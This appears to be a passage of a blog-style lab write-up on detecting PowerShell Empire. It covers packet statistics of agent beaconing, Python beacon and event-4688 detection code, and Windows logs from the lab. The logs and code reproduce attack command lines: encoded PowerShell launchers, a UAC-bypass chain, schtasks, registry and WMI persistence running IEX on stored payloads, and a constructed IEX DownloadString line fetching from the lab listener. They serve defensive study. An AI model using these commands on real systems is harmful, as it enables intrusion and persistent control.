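    for when, src, dst, dport, uri in rows:
        by_pair[(src, dst, dport)].append((when, uri))
    summary = {}
    for pair, events in by_pair.items():
        events.sort()
        deltas = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        if len(deltas) < 3:            # too few requests to call it a beacon
            continue
        med = median(deltas)
        jitter = pstdev(deltas) / med if med > 0 else float("inf")
        summary[pair] = {
            "requests": len(events),
            "uris": sorted({u for _, u in events}),
            "median_interval": med,
            "relative_jitter": jitter,
            "regular_beacon": jitter <= max_jitter,
            "cleartext_http_on_443": pair[2] == 443,   # HTTP dissected on 443
        }
    return summary


if __name__ == "__main__":
    for pair, info in beacon_summary(parse_fields(SAMPLE_FIELDS)).items():
        print(pair)
        for k, v in info.items():
            print(f"  {k:22} {v}")
```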

Doing the same for news.php, we see the following.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap  -t ad -q -z io,stat,60,'(ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) && (http.request.method == GET) && (http.request.uri ==  "/news.php")' | grep --invert-match --perl-regexp "\s+0\s+" | more

======================================================================================================
| IO Statistics                                                                                      |
|                                                                                                    |
| Duration: 112019.300404 secs                                                                        |
| Interval:    60 secs                                                                               |
|                                                                                                    |
| Col 1: (ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) &&                     |
|        (http.request.method == GET) && (http.request.uri ==  "/news.php")                          |
|----------------------------------------------------------------------------------------------------|
|                     |1               |                                                             |
| Date and time       | Frames | Bytes |                                                             |
|--------------------------------------|                                                             |
| 2021-11-21 18:54:57 |      2 |   460 |                                                             |
| 2021-11-21 18:55:57 |      1 |   230 |                                                             |
| 2021-11-21 18:56:57 |      2 |   460 |                                                             |
| 2021-11-21 18:57:57 |      1 |   230 |                                                             |
| 2021-11-21 18:58:57 |      2 |   460 |                                                             |
| 2021-11-21 18:59:57 |      1 |   230 |                                                             |
| 2021-11-21 19:00:57 |      2 |   460 |                                                             |
| 2021-11-21 19:06:57 |      1 |   230 |                                                             |
| 2021-11-21 19:07:57 |      1 |   230 |                                                             |
| 2021-11-21 19:08:57 |      1 |   230 |                                                             |
| 2021-11-21 19:09:57 |      1 |   230 |                                                             |
| 2021-11-21 19:10:57 |      1 |   230 |                                                             |
| 2021-11-21 19:11:57 |      1 |   230 |                                                             |
| 2021-11-21 19:12:57 |      2 |   460 |                                                             |
======================================================================================================


And finally, for /login/process.php.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap  -t ad -q -z io,stat,60,'(ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) && (http.request.method == GET) && (http.request.uri ==  "/login/process.php")' | grep --invert-match --perl-regexp "\s+0\s+" | more

======================================================================================================
| IO Statistics                                                                                      |
|                                                                                                    |
| Duration: 112019.300404 secs                                                                        |
| Interval:    60 secs                                                                               |
|                                                                                                    |
| Col 1: (ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) &&                     |
|        (http.request.method == GET) && (http.request.uri ==  "/login/process.php")                 |
|----------------------------------------------------------------------------------------------------|
|                     |1               |                                                             |
| Date and time       | Frames | Bytes |                                                             |
|--------------------------------------|                                                             |
| 2021-11-20 13:05:57 |      1 |   239 |                                                             |
| 2021-11-20 13:06:57 |      1 |   239 |                                                             |
| 2021-11-20 13:07:57 |      1 |   239 |                                                             |
| 2021-11-20 13:09:57 |      1 |   239 |                                                             |
| 2021-11-21 14:22:57 |      1 |   239 |                                                             |
| 2021-11-21 14:23:57 |      2 |   478 |                                                             |
| 2021-11-21 14:24:57 |      2 |   478 |                                                             |
| 2021-11-21 14:25:57 |      1 |   239 |                                                             |
| 2021-11-21 14:26:57 |      1 |   239 |                                                             |
| 2021-11-21 14:35:57 |      1 |   239 |                                                             |
| 2021-11-21 14:36:57 |      1 |   239 |                                                             |
| 2021-11-21 14:37:57 |      1 |   239 |                                                             |
| 2021-11-21 14:38:57 |      2 |   478 |                                                             |
| 2021-11-21 15:24:57 |      1 |   239 |                                                             |
| 2021-11-21 15:26:57 |      2 |   478 |                                                             |
| 2021-11-21 15:27:57 |      2 |   478 |                                                             |
| 2021-11-21 15:28:57 |      1 |   239 |                                                             |
| 2021-11-21 15:29:57 |      1 |   239 |                                                             |
| 2021-11-21 15:30:57 |      1 |   239 |                                                             |
| 2021-11-21 15:31:57 |      1 |   239 |                                                             |
| 2021-11-21 16:03:57 |      1 |   239 |                                                             |
| 2021-11-21 16:04:57 |      1 |   239 |                                                             |
| 2021-11-21 16:05:57 |      1 |   239 |                                                             |
| 2021-11-21 16:06:57 |      1 |   239 |                                                             |
| 2021-11-21 16:07:57 |      1 |   239 |                                                             |
======================================================================================================

The pattern is clear: the agent checks in at roughly 60 second intervals (the IO statistics above are bucketed per 60 seconds, and the listener's DefaultDelay was set to 60 seconds with DefaultJitter left at 0.0), and each check-in goes to one of the three profile URIs. That is why any single URI shows gaps of a few minutes while the three URIs together account for every minute.
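To turn the pattern above into a check that runs over an exported request list rather than one io,stat table per URI, here is an added example (my code, not from the post and not part of Empire). It groups requests by source, destination and User-Agent, because the agent uses one of the profile URIs per check-in and a per-URI view fragments the series, and flags groups whose inter-request interval is stable. The records are constructed to mimic the lab traffic (the agent at 10.0.0.110 beaconing to 10.0.0.107 every 60 seconds with no jitter, plus irregular browsing to a made-up host 10.0.0.50) in the tab-separated layout tshark produces with -T fields and frame.time_epoch; the thresholds are my own choices.

```python
"""Beacon-interval detection over HTTP request records exported from tshark."""
from collections import defaultdict
from statistics import median

# Empire's listener DefaultProfile format: "uri1,uri2,...|User-Agent"
DEFAULT_PROFILE = ("/admin/get.php,/news.php,/login/process.php|"
                   "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko")

AGENT, LISTENER, OTHER_HOST = "10.0.0.110", "10.0.0.107", "10.0.0.50"   # 10.0.0.50 is made up


def parse_profile(profile):
    """Split an Empire profile string into its URI list and its User-Agent."""
    uris, user_agent = profile.split("|", 1)
    return [u.strip() for u in uris.split(",")], user_agent


def build_sample_export():
    """Constructed stand-in for the output of
       tshark -r x.pcap -Y http.request -T fields -e frame.time_epoch \
              -e ip.src -e ip.dst -e http.request.uri -e http.user_agent
    (one request per line, tab-separated)."""
    uris, ua = parse_profile(DEFAULT_PROFILE)
    base = 1637528637.0                       # 2021-11-21 16:03:57 EST
    rows = []
    for i in range(12):                       # agent: a check-in every 60 s, URI rotates
        rows.append((base + 60 * i, AGENT, LISTENER, uris[i % len(uris)], ua))
    for off in (3, 17, 18, 95, 400, 401, 402, 950):   # bursty, irregular browsing
        rows.append((base + off, AGENT, OTHER_HOST, "/index.html",
                     "Mozilla/5.0 (X11; Linux x86_64)"))
    rows.sort()
    return "\n".join("\t".join((f"{t:.6f}", s, d, u, a)) for t, s, d, u, a in rows)


def parse_tshark_fields(text):
    """Parse tab-separated tshark -T fields lines into
    (epoch_seconds, src, dst, uri, user_agent) tuples, skipping malformed lines."""
    records = []
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 5:
            continue
        try:
            records.append((float(parts[0]), parts[1], parts[2], parts[3], parts[4]))
        except ValueError:             # header line (-E header=y) or empty timestamp
            continue
    return records


def beacon_candidates(requests, min_count=5, max_jitter=0.25):
    """Group requests by (src, dst, user_agent) and report the groups whose
    inter-request interval is stable: the median absolute deviation of the
    intervals divided by the median interval is at most max_jitter."""
    groups = defaultdict(list)
    for ts, src, dst, _uri, ua in requests:
        groups[(src, dst, ua)].append(ts)
    findings = []
    for (src, dst, ua), times in groups.items():
        if len(times) < min_count:
            continue
        times.sort()
        deltas = [b - a for a, b in zip(times, times[1:])]
        interval = median(deltas)
        if interval <= 0:
            continue
        jitter = median([abs(d - interval) for d in deltas]) / interval
        if jitter <= max_jitter:
            findings.append({"src": src, "dst": dst, "user_agent": ua,
                             "count": len(times), "interval_s": interval, "jitter": jitter})
    return findings


if __name__ == "__main__":
    for hit in beacon_candidates(parse_tshark_fields(build_sample_export())):
        print(hit)
```

With DefaultJitter at 0.0, as in this lab, the deviation is exactly zero. Empire's jitter option spreads each sleep around the delay, so a jitter of 0.3 on a 60 second delay gives a ratio of roughly 0.15, still under the threshold; what really hurts this check is a long DefaultDelay or a WorkingHours window that leaves fewer than min_count requests in the capture.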


I also noticed that a lot of these messages report 404 - file or directory not found. It seems like almost every response carried this page. This is the listener's canned default page, styled like an IIS error page to match the Server: Microsoft-IIS/7.5 header the listener sends; when checking for it, compare the HTML body against the status code in the HTTP response line rather than relying on the body text alone, since the grep below only matches the body.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connection-setup.pcapng -V | grep --perl-regexp "404\s+.*?not\s+found" | more                             
    <title>404 - File or directory not found.</title>\r\n
      <h2>404 - File or directory not found.</h2>\r\n
    <title>404 - File or directory not found.</title>\r\n
      <h2>404 - File or directory not found.</h2>\r\n
    <title>404 - File or directory not found.</title>\r\n
      <h2>404 - File or directory not found.</h2>\r\n
    <title>404 - File or directory not found.</title>\r\n
    ....


Transitioning to developing Snort3 rules, to detect this activity for our lab.



References:

Beginning PowerShell Empire - Log Analysis

Looking at the logs from some of this activity as it was being performed during my learning of Powershell Empire.

First up, when the file is executed from the browser, the Security Event Log (event ID 4688; the Process Command Line field is only populated when command line logging for process creation events is enabled) shows chrome.exe creating the cmd.exe process with a command line that includes the welcome.bat file.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x10b8
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0x15a4
	Creator Process Name:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
	Process Command Line:	C:\WINDOWS\system32\cmd.exe /c ""C:\Users\sec560\Downloads\welcome.bat" "

...

We then see cmd.exe spawn powershell.exe, which reads the contents of the welcome.bat file and pipes them to Invoke-Expression (iex).

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xbd0
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0x10b8
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"  -nol -nop -ep bypass "[IO.File]::ReadAllText('C:\Users\sec560\Downloads\welcome.bat')|iex" 
...

Next we see the contents of welcome.bat being executed.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xe10
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0xbd0
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AEUAcgArACQAVAApADsAJABJAHYAPQAkAEQAYQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAQQB0AEEAPQAkAGQAYQBUAGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
...

Now that access has been gained, looking to see what the other commands look like when a request is made against the system.

Surprisingly, when the whoami command was run from within the Empire agent's interactive menu, I did not see any entry in the log. The reason is that the agent handles a handful of commands such as whoami itself, inside its existing PowerShell process, so no new process is created and no 4688 event is written.

Once I dropped down to shell, which runs the command through cmd.exe /c, I was able to see an entry in the logs.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x14d0
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0xe10
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\cmd.exe" /c "whoami /groups"


For the activity to enumerate the local administrators group, we see the following in the log.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x700AD

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x848
	New Process Name:	C:\Windows\System32\net1.exe
	Token Elevation Type:	%%1938
	Mandatory Label:		Mandatory Label\Medium Mandatory Level
	Creator Process ID:	0xa88
	Creator Process Name:	C:\Windows\System32\net.exe
	Process Command Line:	C:\WINDOWS\system32\net1 localgroup administrators
...

Note, if you look closely, you will see it says net1.exe rather than net.exe. This is because net.exe spawns net1.exe to perform this task, so a detection keyed on net.exe alone would miss the actual command line.

For the BypassUAC, I saw the following entry in the log, which I believe is associated with the bypass.

First, I see consent.exe is being executed.

A new process has been created.

Creator Subject:
	Security ID:		SYSTEM
	Account Name:		SEC560STUDENT$
	Account Domain:		SEC560
	Logon ID:		0x3E7

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x36c
	New Process Name:	C:\Windows\System32\consent.exe
	Token Elevation Type:	%%1936
	Mandatory Label:		Mandatory Label\System Mandatory Level
	Creator Process ID:	0x148
	Creator Process Name:	C:\Windows\System32\svchost.exe
	Process Command Line:	consent.exe 328 318 00000277C25C97A0

...

This is then followed by debug.bat being run via cmd.exe. Note the creator: cliconfg.exe, a Microsoft-signed binary that auto-elevates, has spawned cmd.exe at High Mandatory Level, and the Logon ID has changed from 0x700AD to 0x7007D, because the elevated and filtered halves of a split UAC token belong to different logon sessions. An auto-elevating system binary with an unexpected child process is the parent/child pair to hunt for here.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xf0c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xb88
	Creator Process Name:	C:\Windows\System32\cliconfg.exe
	Process Command Line:	"C:\WINDOWS\system32\cmd.exe" /C "C:\Users\sec560\AppData\Local\Temp\debug.bat"

I also see the elevated cmd.exe launch the encoded PowerShell launcher, now running at High Mandatory Level.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1104
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xf0c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	powershell  -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAFIAUwBJAG8AbgBUAEEAQgBsAGUALgBQAFMAVgBFAFIAUwBpAG8AbgAuAE0AQQBKAG8AcgAgAC0ARwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AFQAcABCAFIAawBPAC8AZwA9ACIAKQA7ACQAZABBAFQAQQA9ACQAQgA0ADgARQAuAEQAbwBXAG4AbABPAEEAZABEAGEAdABBACgAJABTAGUAUgArACQAdAApADsAJABJAHYAPQAkAEQAQQB0AEEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAEQAQQBUAGEAWwA0AC4ALgAkAEQAYQBUAGEALgBMAGUAbgBHAFQAaABdADsALQBqAE8AaQBuAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

The above is then followed by the deletion of the debug.bat file.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x140c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xf0c
	Creator Process Name:	C:\Windows\System32\cmd.exe
	Process Command Line:	cmd  /c del "C:\Users\sec560\AppData\Local\Temp\debug.bat"

Similar to the previous example, I noticed that consent.exe was invoked right before the following was seen in the log. This record looks different from the others: the Creator Subject is SYSTEM while the Target Subject is sec560, which is what a process launched on the user's behalf by a SYSTEM service looks like, and it fits the consent.exe invocation just before it. The Creator Process ID is still the medium-integrity agent (0xe10), but the new powershell.exe runs at High Mandatory Level.

A new process has been created.

Creator Subject:
	Security ID:		SYSTEM
	Account Name:		SEC560STUDENT$
	Account Domain:		SEC560
	Logon ID:		0x3E7

Target Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Process Information:
	New Process ID:		0x1670
	New Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0xe10
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAHIAcwBpAG8ATgBUAEEAYgBsAEUALgBQAFMAVgBlAFIAcwBpAE8AbgAuAE0AYQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4A...AVwBDADEAWQBuAGYAQQA4AFkAPQAiACkAOwAkAEQAYQBUAEEAPQAkAEIANAA4AEUALgBEAG8AVwBuAGwAbwBBAGQARABBAHQAQQAoACQAUwBlAFIAKwAkAFQAKQA7ACQAaQB2AD0AJABEAEEAdABBAFsAMAAuAC4AMwBdADsAJABkAGEAVABhAD0AJABEAGEAdABhAFsANAAuAC4AJABEAEEAdABBAC4AbABlAE4AZwB0AEgAXQA7AC0ASgBPAEkATgBbAEMAaABhAFIAWwBdAF0AKAAmACAAJABSACAAJABEAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= 

Something else I noticed is that both ran whoami /groups before executing their commands. Maybe this is just a coincidence or some other artifact of the system. Not enough time to dig into this at this point.

Below shows what is seen when attempting to access the mimilsa.log file.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0xd6c
	New Process Name:	C:\Windows\System32\cmd.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1104
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\cmd.exe" /c "type c:\windows\system32\mimilsa.log"

As the command was run to perform packet capture, we see the following in the logs.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1030
	New Process Name:	C:\Windows\System32\netsh.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1104
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\netsh.exe" trace start capture=yes traceFile=c:\tmp\capture.etl maxSize=1MB

It looks like when netsh trace start runs, netsh.exe itself runs dispdiag.exe and creates a file named dispdiag_start.dat, so expect this child process alongside any netsh-based capture.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x754
	New Process Name:	C:\Windows\System32\dispdiag.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1030
	Creator Process Name:	C:\Windows\System32\netsh.exe
	Process Command Line:	C:\WINDOWS\system32\dispdiag.exe -out dispdiag_start.dat

...

Looking at the scheduled task being created.

A new process has been created.

Creator Subject:
	Security ID:		SEC560STUDENT\sec560
	Account Name:		sec560
	Account Domain:		SEC560STUDENT
	Logon ID:		0x7007D

Target Subject:
	Security ID:		NULL SID
	Account Name:		-
	Account Domain:		-
	Logon ID:		0x0

Process Information:
	New Process ID:		0x1570
	New Process Name:	C:\Windows\System32\schtasks.exe
	Token Elevation Type:	%%1937
	Mandatory Label:		Mandatory Label\High Mandatory Level
	Creator Process ID:	0x1104
	Creator Process Name:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
	Process Command Line:	"C:\Windows\System32\schtasks.exe" /Create /F /RU system /SC ONLOGON /TN SecurityNik-Empire-Schtask /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))\""

Looking at the registry, we see the launcher stored as a base64 string in the debug value that the scheduled task reads back.

C:\WINDOWS\system32>reg query HKLM\Software\Microsoft\Network /v debug

HKEY_LOCAL_MACHINE\Software\Microsoft\Network
    debug    REG_SZ    SQBmACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAGEAQgBMAGUALgBQAFMAVgBFAHIAcwBpAE8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGY
...
JAFYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAQQBUAEEAPQAkAGQAYQB0AEEAWwA0AC4ALgAkAEQAYQB0AEEALgBsAGUATgBnAFQASABdADsALQBqAG8ASQBuAFsAQwBIAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==  

Confirming the schtasks was created.

C:\>schtasks /query /TN SecurityNik-Empire-Schtask   
Folder: \    
TaskName                                 Next Run Time          Status  
======================================== ====================== ===============
SecurityNik-Empire-Schtask               N/A                    Ready          

Looking at the registry after the registry persistence was added.

C:\WINDOWS\system32>reg query HKLM\software\Microsoft\Windows\CurrentVersion /v debug    
HKEY_LOCAL_MACHINE\software\Microsoft\Windows\CurrentVersion
    debug    REG_SZ    SQBGACgAJABQAFMAVgBFAFIAUwBJAE8AbgBUAEEAYgBsAEUALgBQAFMAVgBFAFIAUwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwAp...QQB0AEEAWwAwAC4ALgAzAF0AOwAkAEQAYQB0AEEAPQAkAGQAYQB0AEEAWwA0AC4ALgAkAEQAYQBUAEEALgBsAEUAbgBHAFQAaABdADsALQBqAE8AaQBOAFsAQwBoAEEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

For the WMI persistence, using autorunsc.exe from Sysinternals shows the following.

C:\Tools\SysinternalsSuite>autorunsc.exe  -nobanner  *  | more

   Updater  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Win Hidden -enc $x"  File not found: $x=$((gp HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion Debug).Debug);powershell -Wrin Hidden -enc $x      

There is so much we can see from the logs. However, I just wanted a sneak peek.
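As an added example (my code, not the post's and not part of Empire) that pulls the observations above together, the script below parses 4688 records in the text layout shown throughout this post, follows the Creator Process ID field to reconstruct parent/child relationships and flags the behaviours seen here: the browser to cmd.exe to powershell.exe chain from welcome.bat, the -enc launcher (decoded from base64 of UTF-16LE), net1.exe enumerating the local administrators group, a High integrity child of cliconfg.exe, and schtasks /Create with an IEX launcher. The records are constructed from this post's events with the subject lines omitted and the truncated encoded payload replaced by a short constructed launcher; the list of auto-elevating parents is an illustrative assumption, not something the post establishes.

```python
"""Parse Windows Security event 4688 text records and flag the Empire behaviours above."""
import base64
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed launcher standing in for the page's truncated -enc payload.
LAUNCHER = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.107/news.php')"
ENC_LAUNCHER = base64.b64encode(LAUNCHER.encode("utf-16-le")).decode()


def event(pid, name, label, ppid, pname, cmdline):
    """Render one 4688 record in the Security log's text layout (subject lines omitted)."""
    return (f"A new process has been created.\n\nProcess Information:\n"
            f"\tNew Process ID:\t\t{pid}\n\tNew Process Name:\t{name}\n"
            f"\tMandatory Label:\t\tMandatory Label\\{label} Mandatory Level\n"
            f"\tCreator Process ID:\t{ppid}\n\tCreator Process Name:\t{pname}\n"
            f"\tProcess Command Line:\t{cmdline}\n")


# Constructed from the records shown in this post (PIDs and command lines as on the page).
SAMPLE_LOG = "\n".join([
    event("0x10b8", CMD, "Medium", "0x15a4",
          r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
          r'''C:\WINDOWS\system32\cmd.exe /c ""C:\Users\sec560\Downloads\welcome.bat" "'''),
    event("0xbd0", PS, "Medium", "0x10b8", CMD,
          r'''"{}"  -nol -nop -ep bypass "[IO.File]::ReadAllText('C:\Users\sec560\Downloads\welcome.bat')|iex"'''.format(PS)),
    event("0xe10", PS, "Medium", "0xbd0", PS, '"{}" -noP -sta -w 1 -enc {}'.format(PS, ENC_LAUNCHER)),
    event("0x848", r"C:\Windows\System32\net1.exe", "Medium", "0xa88", r"C:\Windows\System32\net.exe",
          r"C:\WINDOWS\system32\net1 localgroup administrators"),
    event("0xf0c", CMD, "High", "0xb88", r"C:\Windows\System32\cliconfg.exe",
          r'''"C:\WINDOWS\system32\cmd.exe" /C "C:\Users\sec560\AppData\Local\Temp\debug.bat"'''),
    event("0x1570", r"C:\Windows\System32\schtasks.exe", "High", "0x1104", PS,
          r'''"C:\Windows\System32\schtasks.exe" /Create /F /RU system /SC ONLOGON /TN SecurityNik-Empire-Schtask /TR "powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))\""'''),
])

FIELD_RE = re.compile(r"^\s*(New Process ID|New Process Name|Mandatory Label|Creator Process ID|"
                      r"Creator Process Name|Process Command Line):[ \t]*(.*?)[ \t]*$", re.M)
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})")
SUSPICIOUS_PS = re.compile(r"(?i)\b(IEX|Invoke-Expression|Download(?:String|Data)|FromBase64String)\b")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
# Illustrative list of auto-elevating parents (assumption, not from the post).
AUTO_ELEVATE = {"cliconfg.exe", "fodhelper.exe", "eventvwr.exe", "sdclt.exe", "computerdefaults.exe"}


def parse_4688(text):
    """Split the log text on the 4688 message line and collect each record's
    Process Information fields into a dict."""
    records = []
    for chunk in text.split("A new process has been created.")[1:]:
        fields = dict(FIELD_RE.findall(chunk))
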